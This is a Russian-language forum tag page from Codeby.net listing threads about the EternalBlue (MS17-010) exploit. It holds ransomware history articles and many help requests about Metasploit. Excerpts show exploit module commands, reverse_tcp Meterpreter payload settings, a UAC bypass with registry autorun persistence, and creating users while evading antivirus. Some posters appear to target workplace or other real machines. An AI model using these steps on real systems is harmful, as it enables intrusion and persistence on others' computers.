eternalblue

Всё по теме «eternalblue» на форуме Codeby.net. Обсуждений: 28. Разборы, инструменты и практика по информационной безопасности.
  1. DeathDay

    Статья Magnibar — сложнейший азиатский шифровальщик уже в твоем доме: история, анализ. Часть 1

    Magnibar — сложнейший азиатский шифровальщик уже в твоем доме: история, анализ. Часть 1 Время идёт. Только мгновение назад, ты считал что-то новым, а теперь это уже устарело. И просто без малого несколько лет, но ты и не заметил этого. Когда-то компьютерные вирусы распространялись исключительно...
  2. M

    Ошибка ms17_010

    Всем привет, не получается про эксплуатировать уязвимость ms17_010 с помощью metasploit, но выдает ошибку. В чем может быть проблема? Пытался использовать различные payloads, но безуспешно, также отключил брэндмауэр на винде
  3. DeathDay

    Статья Историческая вирусология: Петя ( NotPetya) как же это было на самом деле - история, хронология, анализ

    Прежде чем нырнуть в хронологию и технические потроха этого зловреда, стоит упомянуть один момент, который часто всплывает в обсуждениях NotPetya, но почти не освещается в подобных разборах: вопрос о том, кто вообще стоял за атакой. Спустя месяцы после эпидемии несколько западных правительств...
  4. вася трубочист

    Статья Охота на старые уязвимости. Каковы шансы быть взломанным инструментами прошлого

    Прежде чем перейти к практике, стоит понять сам феномен: почему уязвимости пятилетней и даже десятилетней давности до сих пор остаются рабочим оружием. Дело не только в лени конкретных пользователей — это переплетение технических, экономических и человеческих факторов. Компании годами не...
  5. K

    Meterpreter UAC bypass

    Для начала скажу что хочу добавить файл в автозагрузку windows 7. Юзал классический eternalblue,далее хватал 1-ю сессию meterpreter с помощью exploit/windows/local/bypassuac, потом через ветку реестра Wow6432Node закинул файл в автозапуск,перезагрузился,сессии сдохли,далее файл по сути...
  6. K

    Metasploit Host does NOT appear vulnerable

    Привет всем,ошибка «Хост не выглядит уязвимым» с уязвимостью ms17_010 мучает меня уже около месяца,все было нормально,атаки проходили,но как только я заменил роутер с tp-link на mercusys пошли баги.Я сканировал сеть сперва с помощью сканера eternalblue, потом с nmap и даже с помощью стороннего...
  7. K

    Eternalblue на Windows 7 без Metasploit

    Привет всем, как я могу использовать уязвимость ms17_010_eternalblue в виндовс 7 без самого метасплоит? В инете нашел тему с python,да он мне походит,но нужно каждый раз узнавать pipe коннекта,можно как то без этого? В идеале мне нужен exe файл который можно запускать с параметром а именно с ip...
  8. DGDays

    Не могу использовать ms17_010_eternalblue в Metasploit

    Добрый день! Нашёл такой туториал. В нём используется ms17_010_eternalblue, но мне не удаётся его использовать. Пишет про неизвестную ошибку. Команды: use auxiliary/scanner/smb/smb_ms07_010 show options set RHOSTS <IP Address> run use exploit/windows/smb/ms17_010_eternalblue show options set...
  9. K

    Metasploit eternalblue_win8

    Привет,использую metasploit на андроид,пытаюсь выбрать exploit/windows/smb/ms17_010_eternalblue_win8 Пишет:Failed to load module Я понимаю английский(не удалось загрузить модуль) Пошел по пути расположения этого эксплоита,оказалось он написан на python(это ожидалось) Есть решение данной...
  10. A

    При попытке использовать в msfconsole модуль exploit/windows/smb/ms17_010_eternalblue_win8 выдает ошибку: Failed to load module

    При попытке использовать модуль exploit/windows/smb/ms17_010_eternalblue_win8 в msfconsole выдает ошибку: Failed to load module:exploit/windows/smb/ms17_010_eternalblue_win8. Kali linux 2020.2, версия msf - 5.0.93-dev. Стоит отметить, что этот модуль на python, а не на ruby, однако другие модуле...
  11. R

    Не работает эксплоит ms17-0101 metasploit

    Пытаюсь пройти машину Blue на TryHackMe (TryHackMe | Blue). Дошел до получения доступа. Предполагается использовать Metasploit, эксплоит windows/smb/ms17_010_eternalblue. Получаю следующий вывод: Started reverse TCP handler on 10.0.2.15:4444 10.10.85.121:445 - Using...
  12. KirsanovS

    Termux/Metasploit

    В общем, такой вопрос: на работе есть вафля, есть уязвимая машина для eternalblue, получаю сессию через termux, все окей. так вот, можно ли эту сессию перенести на мой домашний пк, с моей, соответственно вафлей?
  13. Sagain2

    Kali Linux: Eternalblue x86

    (Ребята, только не бейте, я новичек) Даров, хацкеры. У меня тут возник вопрос. Большая часть эксплоитов в metasploit-framework заточены под windows (7) x64 Теперь встречный вопрос, есть ли эксплоит для windows 7 x86? Пол инета облазил не нашел. Ну или есть его заменители?
  14. O

    EtternalBlue ms17-010_psexec ?

    Привет Кодебай! Тестирую ms17-010_psexec , ms17-010_command, victim - winXP. В теплице, с отключенным AV всё прекрасно. С вкл. AV - сессия от psexec не приходит, AV с матом рубит пэйлоад. ms17-010_command работает и через него получилось создать юзэра и включить telnet. Внимание - вопрос. Как...
  15. S

    Кто сталкивался с такой проблемой?

    Здравствуйте господа, помогите уже что только не делал не чего не выхотит. столкнулся с такой проблемай, есть комп win7 открытый 445 порт, сканировал MSF, NESSUS все говорят тачка уязвима. Запускаю exploit/windows/smb/ms17_010_eternalblue нажимаю run. и вот что появлеяться Started reverse TCP...
  16. kasperai

    Проблема с эксплоитом eternal blue doublepulsar

    Проблема вот такая, эксплоит использую не раз и каждый раз одна и та же проблема. Выходит ошибка, скрин P.S(Некоторые термины мне будут не понятны)
  17. M

    Решено Старый добрый ms17_010_eternalblue

    Может ли сей эксплоит пробивать машину на которой установлены настройки сети "Общественная сеть", как этого добиться? Рабочую и домашную сеть он пробивает, а при атаке на машину у которой в настройке сети стоит "Общественная сеть" мы получем TimeOut.
  18. R

    Проблема EternalBlue. Did not receive a response from exploit packet.

    Помогите пожалуйста, почему возникает эта ошибка? Можно ли как-то от нее избавиться, и если можно, то как?
  19. M

    Не получается реализовать Eternalblue(ms17_010) из Linux.

    Здравствуйте, пользователи форума. Пытаюсь провести атаку Eternalblue с моего VDS. Буду краток. sudo ./msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/meterpreter/reverse_tcp(пробовал с windows/x64/meterpreter/reverce_tcp) set LPORT 7775 set LHOST *public dns* set...
  20. D

    Не работает Eternalblue

    Что ввожу до запуска: -msfconsole -use exploit/windows/smb/ms17_010_eternalblue -set rhost ******** -exploit Окно после запуска: - Connecting to target for exploitation. [+] - Connection established for exploitation. [+] - Target OS selected valid for OS indicated by SMB reply - CORE raw...